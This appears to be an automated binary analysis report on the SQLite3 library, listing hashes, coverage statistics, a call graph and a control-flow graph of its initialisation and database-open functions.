                                                                                              • Opcode ID: f6427961911500027d9936099a07af868612d0607be5df9ad5f86dc0d0ca67e9
                                                                                              • Instruction ID: 5635bb24951274f295da3d916724f167d5b14ff73c36035396771ed5e0595378
                                                                                              • Opcode Fuzzy Hash: f6427961911500027d9936099a07af868612d0607be5df9ad5f86dc0d0ca67e9
                                                                                              • Instruction Fuzzy Hash: 30F0F6375402047AEB102A65DC03EDB77EDDF95B20F044119FE14AA191F9B5EA40D760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0.4%
                                                                                              Total number of Nodes:463
                                                                                              Total number of Limit Nodes:65
                                                                                              execution_graph 26718 61e19553 GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register 26719 61e195ce 26718->26719 26720 61e19104 26721 61e1944e 26720->26721 26722 61e19113 26720->26722 26722->26721 26723 61e19135 sqlite3_mutex_enter 26722->26723 26724 61e19157 26723->26724 26730 61e19174 26723->26730 26726 61e19160 sqlite3_config 26724->26726 26724->26730 26725 61e19221 sqlite3_mutex_leave sqlite3_mutex_enter 26727 61e193ef sqlite3_mutex_leave sqlite3_mutex_enter 26725->26727 26733 61e1924c 26725->26733 26726->26730 26728 61e19416 sqlite3_mutex_free 26727->26728 26729 61e1942d sqlite3_mutex_leave 26727->26729 26728->26729 26729->26721 26730->26725 26731 61e191d9 sqlite3_mutex_leave 26730->26731 26731->26721 26733->26727 26734 61e192b8 sqlite3_malloc 26733->26734 26736 61e192e5 sqlite3_config 26733->26736 26737 61e192f9 26733->26737 26735 61e19313 sqlite3_free sqlite3_os_init 26734->26735 26738 61e192d7 26734->26738 26735->26738 26736->26737 26737->26734 26737->26738 26738->26727 26739 61e7f22c sqlite3_mutex_enter 26740 61e7f288 26739->26740 26747 61e7f36b 26740->26747 26763 61e0fc12 sqlite3_free 26740->26763 26742 61e7f465 26800 61e0fc12 sqlite3_free 26742->26800 26744 61e7f2d1 26764 61e13fc4 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 26744->26764 26745 61e7f472 26801 61e292d9 12 API calls 26745->26801 26747->26742 26747->26745 26799 61e4add7 125 API calls 26747->26799 26748 61e7f2e2 26765 61e64b10 26748->26765 26750 61e7f734 26802 61e0fc12 sqlite3_free 26750->26802 26754 61e7f741 26803 61e14e9c sqlite3_free sqlite3_free 26754->26803 26755 61e7f338 26755->26747 26798 61e0fc12 sqlite3_free 26755->26798 26758 61e7f74c 26804 61e102e2 sqlite3_free 26758->26804 26762 61e7f759 sqlite3_mutex_leave 26763->26744 26764->26748 26766 61e64b40 26765->26766 26767 61e64b29 26765->26767 26809 61e64660 26766->26809 26777 61e64b49 26767->26777 26805 61e03c3f 26767->26805 26770 61e64b36 26775 61e64b6c sqlite3_strnicmp 26770->26775 26781 61e64bc6 26770->26781 26796 61e64c36 26770->26796 26771 61e64d40 26823 61e29ab5 sqlite3_free sqlite3_str_reset sqlite3_str_vappendf 26771->26823 26772 61e64d1a 26822 61e29ab5 sqlite3_free sqlite3_str_reset sqlite3_str_vappendf 26772->26822 26776 61e64b8f 26775->26776 26775->26796 26813 61e04223 sqlite3_stricmp 26776->26813 26777->26747 26777->26755 26797 61e29ab5 sqlite3_free sqlite3_str_reset sqlite3_str_vappendf 26777->26797 26779 61e64b9a 26779->26796 26814 61e135cf 11 API calls 26779->26814 26781->26777 26782 61e64c2c 26781->26782 26783 61e64c3b 26781->26783 26781->26796 26815 61e0fc12 sqlite3_free 26782->26815 26816 61e2c964 10 API calls 26783->26816 26786 61e64c6b 26817 61e2c964 10 API calls 26786->26817 26788 61e64c76 26818 61e2c964 10 API calls 26788->26818 26790 61e64c8b 26819 61e2de36 11 API calls 26790->26819 26792 61e64ca7 26792->26777 26820 61e29ab5 sqlite3_free sqlite3_str_reset sqlite3_str_vappendf 26792->26820 26794 61e64cc6 26821 61e0fc12 sqlite3_free 26794->26821 26796->26771 26796->26772 26796->26777 26797->26755 26798->26747 26799->26742 26800->26745 26801->26750 26802->26754 26803->26758 26804->26762 26806 61e03c4f 26805->26806 26807 61e03cac sqlite3_stricmp 26806->26807 26808 61e03c99 26806->26808 26807->26806 26807->26808 26808->26770 26810 61e64674 26809->26810 26811 61e64670 26809->26811 26824 61e645cd 26810->26824 26811->26767 26813->26779 26814->26781 26815->26796 26816->26786 26817->26788 26818->26790 26819->26792 26820->26794 26821->26796 26822->26777 26823->26777 26825 61e645f6 26824->26825 26826 61e64603 26824->26826 26828 61e6461a 26825->26828 26829 61e642b1 120 API calls 26825->26829 26830 61e642b1 26826->26830 26828->26811 26829->26825 26859 61e72f0b 26830->26859 26835 61e6436d 26836 61e643ac 26835->26836 26883 61e41a63 26835->26883 26845 61e643cf 26836->26845 26900 61e14319 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 26836->26900 26839 61e64386 26839->26836 26840 61e64393 26839->26840 26899 61e121f1 sqlite3_free 26840->26899 26842 61e64451 26843 61e64470 26842->26843 26846 61e64495 26842->26846 26902 61e121f1 sqlite3_free 26843->26902 26845->26842 26845->26843 26901 61e1476c sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 26845->26901 26903 61e2dd73 sqlite3_str_reset sqlite3_str_vappendf 26846->26903 26848 61e643a4 26858 61e6435b 26848->26858 26908 61e157ff sqlite3_free sqlite3_free sqlite3_free sqlite3_free 26848->26908 26851 61e644cc sqlite3_exec 26904 61e0fc12 sqlite3_free 26851->26904 26853 61e64522 26854 61e64530 26853->26854 26905 61e641d7 sqlite3_stricmp sqlite3_free sqlite3_str_reset sqlite3_str_vappendf sqlite3_exec 26853->26905 26856 61e6447f 26854->26856 26906 61e15858 7 API calls 26854->26906 26856->26848 26856->26858 26907 61e4788c 102 API calls 26856->26907 26858->26825 26860 61e72f3b 26859->26860 26862 61e72f4e 26859->26862 26909 61e2dd89 sqlite3_str_reset sqlite3_log sqlite3_str_vappendf 26860->26909 26863 61e64337 26862->26863 26864 61e72f63 sqlite3_strnicmp 26862->26864 26873 61e72f5c 26862->26873 26863->26848 26863->26858 26874 61e13faa 26863->26874 26865 61e72f97 26864->26865 26864->26873 26867 61e72fae sqlite3_prepare 26865->26867 26868 61e72ff1 26867->26868 26869 61e7302b sqlite3_finalize 26867->26869 26868->26869 26870 61e73005 26868->26870 26871 61e73017 sqlite3_errmsg 26868->26871 26869->26863 26870->26869 26910 61e2dd89 sqlite3_str_reset sqlite3_log sqlite3_str_vappendf 26871->26910 26873->26863 26911 61e2dd89 sqlite3_str_reset sqlite3_log sqlite3_str_vappendf 26873->26911 26875 61e13fb3 26874->26875 26876 61e13fc2 26874->26876 26875->26876 26877 61e13f37 sqlite3_mutex_try 26875->26877 26876->26835 26878 61e13f61 26877->26878 26879 61e13f53 26877->26879 26880 61e13f87 sqlite3_mutex_enter 26878->26880 26912 61e029cb sqlite3_mutex_leave 26878->26912 26879->26835 26881 61e13f7a 26880->26881 26881->26879 26881->26880 26884 61e13faa 3 API calls 26883->26884 26885 61e41a7c 26884->26885 26886 61e41f9f 26885->26886 26890 61e41b98 memcmp 26885->26890 26891 61e41f9a 26885->26891 26892 61e41be9 memcmp 26885->26892 26893 61e41ea4 memcmp 26885->26893 26894 61e41c6e memcmp 26885->26894 26913 61e40b41 26885->26913 26935 61e02ddd 26885->26935 26938 61e94f53 50 API calls 26885->26938 26939 61e0b271 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 26885->26939 26940 61e14925 15 API calls 26885->26940 26941 61e2405a sqlite3_log 26885->26941 26886->26891 26942 61e1310c 9 API calls 26886->26942 26890->26885 26891->26839 26892->26885 26893->26885 26894->26885 26899->26848 26901->26842 26902->26856 26903->26851 26904->26853 26905->26854 26906->26856 26907->26848 26908->26858 26909->26863 26910->26869 26911->26863 26912->26878 26924 61e40b59 26913->26924 26927 61e40ea6 26913->26927 26914 61e40f58 26914->26885 26915 61e40dd7 26915->26914 26953 61e13763 sqlite3_free sqlite3_free 26915->26953 26918 61e014e3 17 API calls 26919 61e40e10 26918->26919 26919->26915 26920 61e40e2b memcmp 26919->26920 26928 61e40e49 26920->26928 26921 61e40b7f 26921->26915 26922 61e40d8a 26921->26922 26923 61e01617 48 API calls 26921->26923 26934 61e40c64 26921->26934 26922->26915 26922->26934 26950 61e3ff3e 73 API calls 26922->26950 26926 61e40d74 26923->26926 26924->26915 26924->26921 26932 61e40c16 26924->26932 26924->26934 26946 61e01617 26924->26946 26926->26922 26949 61e24025 sqlite3_log 26926->26949 26927->26915 26952 61e33ef6 33 API calls 26927->26952 26928->26927 26951 61e94f53 50 API calls 26928->26951 26932->26921 26932->26934 26943 61e014e3 26932->26943 26934->26915 26934->26918 26934->26928 27009 61e0278e 26935->27009 26937 61e02dfd 26937->26885 26938->26885 26939->26885 26940->26885 26941->26885 26942->26891 26954 61e23de7 26943->26954 26966 61e3e688 26946->26966 26949->26922 26950->26934 26951->26927 26952->26927 26953->26914 26958 61e23e11 26954->26958 26955 61e23e7b ReadFile 26956 61e23ea4 26955->26956 26955->26958 26963 61e238ff sqlite3_log 26956->26963 26958->26955 26958->26956 26959 61e0150a 26958->26959 26961 61e23ed7 26958->26961 26964 61e189f3 sqlite3_win32_sleep 26958->26964 26959->26921 26965 61e22ebc 14 API calls 26961->26965 26963->26959 26964->26958 26965->26959 26967 61e3e6d6 26966->26967 26968 61e3e6c8 26966->26968 26972 61e01640 26967->26972 27004 61e18b42 26967->27004 27008 61e3e3a1 30 API calls 26968->27008 26971 61e3e6ee 26973 61e3e6f5 sqlite3_free 26971->26973 26974 61e3e70a 26971->26974 26972->26932 26973->26972 26975 61e3e72d sqlite3_win32_is_nt 26974->26975 26976 61e3e714 26974->26976 26975->26976 26977 61e3e736 26975->26977 26976->26977 26978 61e3e7a7 26976->26978 26979 61e189f3 sqlite3_win32_sleep 26976->26979 26977->26978 26980 61e3e787 sqlite3_free sqlite3_free 26977->26980 26981 61e3e812 sqlite3_win32_is_nt 26978->26981 26982 61e3e81f CreateFileW 26978->26982 26979->26976 26980->26972 26981->26982 26994 61e3e8cd 26981->26994 26983 61e3e8c5 26982->26983 26987 61e3e866 26982->26987 26984 61e238ff sqlite3_log 26983->26984 26986 61e3e97e 26984->26986 26985 61e189f3 sqlite3_win32_sleep 26985->26987 26988 61e3e987 sqlite3_free sqlite3_free 26986->26988 26989 61e3ea09 sqlite3_free sqlite3_free 26986->26989 26987->26982 26987->26983 26987->26985 26990 61e2393e 20 API calls 26987->26990 26992 61e3e9a3 26988->26992 26993 61e3e9d5 26988->26993 26996 61e3ea48 sqlite3_uri_boolean 26989->26996 26990->26987 26992->26993 26998 61e3e9a9 26992->26998 26995 61e22ebc 14 API calls 26993->26995 26994->26983 26997 61e189f3 sqlite3_win32_sleep 26994->26997 27002 61e2393e 20 API calls 26994->27002 27000 61e3e9f8 26995->27000 26996->26972 26997->26994 26999 61e3e688 37 API calls 26998->26999 26999->26972 27003 61e24025 sqlite3_log 27000->27003 27002->26994 27003->26972 27005 61e18b53 27004->27005 27006 61e18b5d sqlite3_win32_is_nt 27004->27006 27005->27006 27006->27005 27007 61e18b66 27006->27007 27008->26967 27012 61e40525 27009->27012 27010 61e027ad 27010->26937 27014 61e40544 27012->27014 27015 61e4064e 27014->27015 27017 61e4065f 27014->27017 27021 61e40658 27014->27021 27026 61e4062e 27014->27026 27036 61e2405a sqlite3_log 27015->27036 27018 61e40675 27017->27018 27019 61e406b4 27017->27019 27018->27021 27022 61e4067d 27018->27022 27027 61e33760 27019->27027 27021->27026 27039 61e404e1 73 API calls 27021->27039 27023 61e40695 27022->27023 27022->27026 27037 61e1344c 7 API calls 27022->27037 27038 61e1358f 7 API calls 27023->27038 27026->27010 27028 61e3377f 27027->27028 27029 61e337ed 27027->27029 27030 61e33800 27028->27030 27031 61e33789 27028->27031 27035 61e337eb 27028->27035 27040 61e33660 8 API calls 27029->27040 27034 61e014e3 17 API calls 27030->27034 27033 61e014e3 17 API calls 27031->27033 27033->27035 27034->27035 27035->27021 27036->27021 27037->27023 27038->27026 27040->27028 27041 61e93377 sqlite3_initialize 27042 61e93406 27041->27042 27043 61e93395 27041->27043 27049 61e1f02c 10 API calls 27043->27049 27045 61e933e3 27167 61e1095d sqlite3_free 27045->27167 27046 61e933c0 27046->27045 27050 61e92617 sqlite3_initialize 27046->27050 27049->27046 27051 61e93339 27050->27051 27052 61e9264d 27050->27052 27051->27045 27168 61e12df3 27052->27168 27054 61e9332b 27055 61e932ee sqlite3_errcode 27054->27055 27058 61e93309 27055->27058 27059 61e932fd sqlite3_close 27055->27059 27056 61e926cf sqlite3_mutex_enter 27171 61e297cf 27056->27171 27062 61e93314 sqlite3_free 27058->27062 27059->27062 27060 61e926a3 27060->27054 27060->27056 27063 61e926c2 sqlite3_free 27060->27063 27062->27051 27063->27054 27064 61e297cf 16 API calls 27065 61e927f2 27064->27065 27066 61e297cf 16 API calls 27065->27066 27067 61e9281a 27066->27067 27068 61e297cf 16 API calls 27067->27068 27069 61e92842 27068->27069 27070 61e297cf 16 API calls 27069->27070 27071 61e9286a 27070->27071 27072 61e932e3 sqlite3_mutex_leave 27071->27072 27182 61e12bc4 27071->27182 27072->27055 27075 61e928ae 27265 61e3aae5 13 API calls 27075->27265 27076 61e928a2 27264 61e22c1a sqlite3_log 27076->27264 27079 61e928ac 27080 61e928d3 27079->27080 27081 61e92915 27079->27081 27266 61e292d9 12 API calls 27080->27266 27188 61e48a10 27081->27188 27085 61e92905 sqlite3_free 27085->27072 27086 61e9295b 27088 61e13faa 3 API calls 27086->27088 27087 61e92940 27089 61e102ca sqlite3_free 27087->27089 27091 61e92966 27088->27091 27090 61e92956 27089->27090 27090->27072 27250 61e166ca 27091->27250 27093 61e92973 27094 61e166ca 3 API calls 27093->27094 27095 61e9299c 27094->27095 27095->27072 27254 61e102ca 27095->27254 27098 61e929f8 sqlite3_errcode 27100 61e92a0c 27098->27100 27142 61e92d1b 27098->27142 27099 61e929f1 27099->27098 27102 61e93014 27100->27102 27103 61e92a14 sqlite3_malloc 27100->27103 27101 61e92d3e 27101->27102 27107 61e92df2 sqlite3_create_module 27101->27107 27109 61e93026 sqlite3_create_function 27102->27109 27119 61e93146 27102->27119 27103->27102 27105 61e92a2e 27103->27105 27104 61e92d2c sqlite3_errcode 27104->27072 27104->27101 27267 61e22d96 15 API calls 27105->27267 27107->27102 27112 61e92e1c sqlite3_malloc 27107->27112 27108 61e93247 27110 61e93252 27108->27110 27114 61e102ca sqlite3_free 27108->27114 27113 61e93070 sqlite3_create_function 27109->27113 27109->27119 27258 61e14545 27110->27258 27111 61e92a79 27111->27101 27115 61e92a83 sqlite3_create_function 27111->27115 27117 61e92e37 27112->27117 27112->27119 27113->27119 27120 61e930ba sqlite3_create_function 27113->27120 27114->27110 27115->27101 27122 61e92acd sqlite3_create_function 27115->27122 27270 61e1baad 8 API calls 27117->27270 27118 61e92d54 sqlite3_mutex_enter 27118->27142 27119->27108 27125 61e931ae 27119->27125 27130 61e9316a sqlite3_create_function 27119->27130 27120->27119 27121 61e93100 27120->27121 27274 61e22d96 15 API calls 27121->27274 27122->27101 27127 61e92b13 sqlite3_create_function 27122->27127 27123 61e93269 sqlite3_wal_autocheckpoint 27123->27072 27135 61e93211 27125->27135 27138 61e931be sqlite3_create_window_function 27125->27138 27127->27101 27132 61e92b5d 27127->27132 27128 61e92e70 27133 61e932c4 27128->27133 27271 61e1baad 8 API calls 27128->27271 27129 61e92d79 sqlite3_mutex_leave 27134 61e92dc7 sqlite3_free 27129->27134 27129->27142 27130->27119 27131 61e93120 27131->27119 27275 61e22d96 15 API calls 27131->27275 27145 61e92b77 sqlite3_create_function 27132->27145 27149 61e92bbb 27132->27149 27277 61e0a35f sqlite3_free sqlite3_free sqlite3_free 27133->27277 27136 61e92ddb 27134->27136 27134->27142 27135->27108 27144 61e9321c sqlite3_create_module 27135->27144 27136->27104 27138->27125 27141 61e92e90 27141->27133 27272 61e1baad 8 API calls 27141->27272 27142->27101 27142->27104 27142->27118 27142->27129 27142->27134 27269 61e292d9 12 API calls 27142->27269 27143 61e932d3 sqlite3_free 27143->27102 27144->27135 27145->27132 27148 61e92eb0 27148->27133 27150 61e92eb8 sqlite3_create_function 27148->27150 27149->27101 27268 61e22d96 15 API calls 27149->27268 27150->27133 27151 61e92efe sqlite3_create_function 27150->27151 27151->27133 27152 61e92f44 sqlite3_overload_function 27151->27152 27152->27133 27153 61e92f66 sqlite3_overload_function 27152->27153 27153->27133 27154 61e92f88 sqlite3_overload_function 27153->27154 27154->27133 27156 61e92faa sqlite3_overload_function 27154->27156 27156->27133 27159 61e92fcc sqlite3_overload_function 27156->27159 27157 61e92c87 27157->27101 27158 61e92c91 sqlite3_create_function 27157->27158 27158->27102 27160 61e92cda sqlite3_create_function 27158->27160 27159->27133 27161 61e92fee 27159->27161 27160->27142 27273 61e22d96 15 API calls 27161->27273 27163 61e9300a 27163->27102 27276 61e22d96 15 API calls 27163->27276 27165 61e93297 27165->27102 27166 61e932a1 sqlite3_create_module 27165->27166 27166->27102 27167->27042 27278 61e10f19 27168->27278 27172 61e29806 27171->27172 27173 61e12bc4 11 API calls 27172->27173 27174 61e2982f 27173->27174 27177 61e29893 27174->27177 27181 61e29835 27174->27181 27175 61e12bc4 11 API calls 27176 61e29848 27175->27176 27178 61e2987d 27176->27178 27180 61e102ca sqlite3_free 27176->27180 27292 61e292d9 12 API calls 27177->27292 27178->27064 27180->27178 27181->27175 27183 61e12c52 27182->27183 27184 61e12bd7 27182->27184 27183->27075 27183->27076 27184->27183 27293 61e12a25 10 API calls 27184->27293 27186 61e12c3c 27186->27183 27294 61e0fc12 sqlite3_free 27186->27294 27189 61e48a32 strcmp 27188->27189 27190 61e48a5c 27188->27190 27189->27190 27224 61e48d78 27189->27224 27191 61e12df3 6 API calls 27190->27191 27190->27224 27202 61e48abc 27191->27202 27192 61e12df3 6 API calls 27193 61e48f45 27192->27193 27195 61e48f5d 27193->27195 27196 61e48f4b 27193->27196 27194 61e496c8 27194->27086 27194->27087 27199 61e49064 27195->27199 27300 61e0fc12 sqlite3_free 27195->27300 27299 61e0fc12 sqlite3_free 27196->27299 27197 61e48cfc 27200 61e12df3 6 API calls 27197->27200 27201 61e4912d 27199->27201 27206 61e01617 48 API calls 27199->27206 27210 61e48d14 27200->27210 27301 61e14925 15 API calls 27201->27301 27202->27194 27202->27197 27209 61e10f19 6 API calls 27202->27209 27204 61e4955e 27207 61e49563 sqlite3_free sqlite3_free 27204->27207 27216 61e490b9 27206->27216 27246 61e4951a 27207->27246 27208 61e48f58 27208->27207 27304 61e4891e 91 API calls 27208->27304 27212 61e48b4f 27209->27212 27210->27204 27221 61e10f19 6 API calls 27210->27221 27210->27224 27214 61e48b65 sqlite3_free 27212->27214 27215 61e48b77 27212->27215 27213 61e495be sqlite3_mutex_leave 27213->27194 27214->27194 27218 61e48b80 27215->27218 27225 61e48bb1 sqlite3_free sqlite3_free 27215->27225 27217 61e49190 27216->27217 27219 61e49104 sqlite3_uri_boolean 27216->27219 27232 61e48eb8 27217->27232 27302 61e0ace3 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 27217->27302 27226 61e48be2 sqlite3_mutex_enter 27218->27226 27219->27201 27223 61e49133 sqlite3_uri_boolean 27219->27223 27236 61e48de0 27221->27236 27222 61e49231 sqlite3_free 27222->27232 27223->27201 27224->27192 27224->27208 27225->27194 27295 61e01713 27226->27295 27229 61e48c09 27230 61e48c1c strcmp 27229->27230 27231 61e48cdf sqlite3_mutex_leave sqlite3_free 27229->27231 27238 61e48c4c 27229->27238 27230->27229 27231->27197 27247 61e49474 27231->27247 27232->27208 27233 61e014e3 17 API calls 27232->27233 27239 61e49353 27232->27239 27233->27239 27234 61e13faa 3 API calls 27234->27246 27235 61e48cbd 27235->27231 27236->27208 27236->27224 27237 61e48eab 27236->27237 27297 61e24025 sqlite3_log 27236->27297 27298 61e0fc12 sqlite3_free 27237->27298 27238->27235 27241 61e48c81 sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 27238->27241 27239->27208 27248 61e49627 27239->27248 27303 61e14925 15 API calls 27239->27303 27241->27194 27244 61e49439 27244->27208 27244->27247 27244->27248 27245 61e48e99 27245->27224 27245->27237 27246->27194 27246->27213 27247->27234 27248->27208 27249 61e4966a sqlite3_mutex_enter sqlite3_mutex_leave 27248->27249 27249->27248 27251 61e166d9 27250->27251 27252 61e166e5 27250->27252 27253 61e13faa 3 API calls 27251->27253 27252->27093 27253->27252 27256 61e102a0 27254->27256 27255 61e102e0 sqlite3_overload_function 27255->27098 27255->27099 27256->27254 27256->27255 27305 61e10259 sqlite3_free 27256->27305 27259 61e14558 27258->27259 27260 61e14597 sqlite3_free 27259->27260 27261 61e145d5 27259->27261 27262 61e145a5 27259->27262 27260->27262 27261->27123 27262->27261 27263 61e10f19 6 API calls 27262->27263 27263->27261 27264->27079 27265->27079 27266->27085 27267->27111 27268->27157 27269->27134 27270->27128 27271->27141 27272->27148 27273->27163 27274->27131 27275->27119 27276->27165 27277->27143 27279 61e10f35 27278->27279 27280 61e11009 27278->27280 27279->27280 27281 61e10f50 sqlite3_mutex_enter 27279->27281 27280->27060 27284 61e10f66 27281->27284 27282 61e10fbd 27288 61e23fdb malloc 27282->27288 27283 61e10ff8 sqlite3_mutex_leave 27283->27280 27284->27282 27291 61e0a0e3 sqlite3_mutex_leave sqlite3_mutex_enter 27284->27291 27286 61e10fd2 27286->27283 27289 61e24001 sqlite3_log 27288->27289 27290 61e23ff4 27288->27290 27289->27290 27290->27286 27291->27282 27292->27178 27293->27186 27294->27183 27296 61e0171c sqlite3_mutex_enter 27295->27296 27296->27229 27297->27245 27298->27232 27299->27208 27300->27199 27301->27217 27302->27222 27303->27244 27304->27204 27305->27256

                                                                                              Executed Functions

                                                                                              Function 61E92617 Relevance: 93.5, APIs: 39, Strings: 14, Instructions: 767COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 61e92617-61e92647 sqlite3_initialize 1 61e93339-61e93343 0->1 2 61e9264d-61e92659 0->2 3 61e9265b-61e9265e 2->3 4 61e92671-61e92676 2->4 3->4 5 61e92660-61e9266a 3->5 6 61e92678-61e9267d 4->6 7 61e9267f-61e92686 4->7 5->4 8 61e9268d 6->8 9 61e92688 7->9 10 61e92690-61e926a7 call 61e12df3 7->10 8->10 9->8 13 61e9332b-61e9332d 10->13 14 61e926ad-61e926af 10->14 15 61e932ee-61e932fb sqlite3_errcode 13->15 16 61e926cf-61e9286e sqlite3_mutex_enter call 61e297cf * 5 14->16 17 61e926b1-61e926c0 call 61e01713 14->17 19 61e93309-61e9330b 15->19 20 61e932fd-61e93307 sqlite3_close 15->20 35 61e932e3-61e932e9 sqlite3_mutex_leave 16->35 36 61e92874-61e928a0 call 61e12bc4 16->36 17->16 26 61e926c2-61e926ca sqlite3_free 17->26 23 61e93314-61e93329 sqlite3_free 19->23 24 61e9330d 19->24 20->23 23->1 24->23 26->13 35->15 39 61e928ae-61e928c8 call 61e3aae5 36->39 40 61e928a2-61e928ac call 61e22c1a 36->40 44 61e928cd-61e928d1 39->44 40->44 45 61e928d3-61e928d6 44->45 46 61e92915-61e9293e call 61e48a10 44->46 47 61e928d8-61e928da call 61e0aaa8 45->47 48 61e928df-61e92910 call 61e292d9 sqlite3_free 45->48 54 61e9295b-61e9297d call 61e13faa call 61e166ca 46->54 55 61e92940-61e92956 call 61e102ca 46->55 47->48 48->35 62 61e92988-61e929c5 call 61e0b1a9 call 61e166ca 54->62 63 61e9297f-61e92985 54->63 55->35 62->35 68 61e929cb-61e929ef call 61e102ca sqlite3_overload_function 62->68 63->62 71 61e929f8-61e92a06 sqlite3_errcode 68->71 72 61e929f1-61e929f3 call 61e0aaa8 68->72 74 61e92d1b-61e92d1d 71->74 75 61e92a0c-61e92a0e 71->75 72->71 76 61e92de0-61e92de4 74->76 77 61e92d23-61e92d2a 74->77 78 61e93014-61e93018 75->78 79 61e92a14-61e92a28 sqlite3_malloc 75->79 76->78 84 61e92dea-61e92dec 76->84 80 61e92d2c-61e92d38 sqlite3_errcode 77->80 81 61e92d43-61e92d48 77->81 85 61e93148-61e9314c 78->85 86 61e9301e-61e93020 78->86 82 61e9332f-61e93334 79->82 83 61e92a2e-61e92a7d call 61e22d96 79->83 80->35 87 61e92d3e 80->87 90 61e92d4a-61e92d68 call 61e01713 sqlite3_mutex_enter 81->90 82->78 83->76 102 61e92a83-61e92ac7 sqlite3_create_function 83->102 84->78 89 61e92df2-61e92e16 sqlite3_create_module 84->89 91 61e93152-61e93154 85->91 92 61e93247-61e93249 85->92 86->85 93 61e93026-61e9306a sqlite3_create_function 86->93 87->76 89->78 97 61e92e1c-61e92e31 sqlite3_malloc 89->97 112 61e92d6a-61e92d73 90->112 113 61e92d75-61e92d77 90->113 94 61e9324b-61e9324d call 61e102ca 91->94 99 61e9315a-61e9315f 91->99 92->94 95 61e93252-61e93264 call 61e14545 92->95 93->85 100 61e93070-61e930b4 sqlite3_create_function 93->100 94->95 110 61e93269-61e93279 sqlite3_wal_autocheckpoint 95->110 97->85 104 61e92e37-61e92e72 call 61e1baad 97->104 106 61e93161-61e93164 99->106 100->85 107 61e930ba-61e930fe sqlite3_create_function 100->107 102->76 109 61e92acd-61e92b0d sqlite3_create_function 102->109 124 61e92e78-61e92e92 call 61e1baad 104->124 125 61e932c4 104->125 114 61e931ae-61e931b3 106->114 115 61e93166-61e93168 106->115 107->85 108 61e93100-61e93124 call 61e22d96 107->108 108->85 131 61e93126-61e93146 call 61e22d96 108->131 109->76 117 61e92b13-61e92b57 sqlite3_create_function 109->117 110->35 119 61e92d79-61e92d90 sqlite3_mutex_leave 112->119 113->119 121 61e931b5-61e931b8 114->121 115->114 120 61e9316a-61e931ac sqlite3_create_function 115->120 117->76 123 61e92b5d-61e92b6c 117->123 126 61e92d92-61e92da8 119->126 127 61e92dc7-61e92dd5 sqlite3_free 119->127 120->106 128 61e931ba-61e931bc 121->128 129 61e93211 121->129 133 61e92b6e-61e92b70 123->133 124->125 149 61e92e98-61e92eb2 call 61e1baad 124->149 135 61e932c9-61e932de call 61e0a35f sqlite3_free 125->135 126->127 144 61e92daa-61e92dc2 call 61e292d9 126->144 127->90 132 61e92ddb 127->132 128->129 136 61e931be-61e9320f sqlite3_create_window_function 128->136 130 61e93213-61e93216 129->130 130->92 138 61e93218-61e9321a 130->138 131->85 132->80 140 61e92bbb-61e92bbd 133->140 141 61e92b72-61e92b75 133->141 135->78 136->121 138->92 146 61e9321c-61e93245 sqlite3_create_module 138->146 140->76 150 61e92bc3-61e92bd5 140->150 141->140 148 61e92b77-61e92bb9 sqlite3_create_function 141->148 144->127 146->130 148->133 149->125 157 61e92eb8-61e92ef8 sqlite3_create_function 149->157 151 61e92bd7-61e92bd9 150->151 155 61e92bdb-61e92bde 151->155 156 61e92c0d-61e92c0f 151->156 155->156 158 61e92be0-61e92c0b 155->158 156->76 159 61e92c15-61e92c27 156->159 157->135 160 61e92efe-61e92f3e sqlite3_create_function 157->160 158->151 161 61e92c29-61e92c2b 159->161 160->135 162 61e92f44-61e92f60 sqlite3_overload_function 160->162 164 61e92c2d-61e92c30 161->164 165 61e92c60-61e92c62 161->165 162->135 166 61e92f66-61e92f82 sqlite3_overload_function 162->166 164->165 167 61e92c32-61e92c5e 164->167 165->76 168 61e92c68-61e92c8b call 61e22d96 165->168 166->135 169 61e92f88-61e92fa4 sqlite3_overload_function 166->169 167->161 168->76 174 61e92c91-61e92cd4 sqlite3_create_function 168->174 169->135 171 61e92faa-61e92fc6 sqlite3_overload_function 169->171 171->135 175 61e92fcc-61e92fe8 sqlite3_overload_function 171->175 174->78 176 61e92cda-61e92d19 sqlite3_create_function 174->176 175->135 177 61e92fee-61e9300e call 61e22d96 175->177 176->74 177->78 180 61e9327b-61e9329b call 61e22d96 177->180 180->78 183 61e932a1-61e932bf sqlite3_create_module 180->183 183->78
                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E92640
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_free.SQLITE3 ref: 61E926C5
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E926DA
                                                                                                • Part of subcall function 61E3AAE5: memcmp.MSVCRT ref: 61E3AB33
                                                                                                • Part of subcall function 61E3AAE5: sqlite3_malloc64.SQLITE3 ref: 61E3AB67
                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E93061
                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E930AB
                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E930F5
                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E931A5
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E932E9
                                                                                              • sqlite3_free.SQLITE3 ref: 61E9290B
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
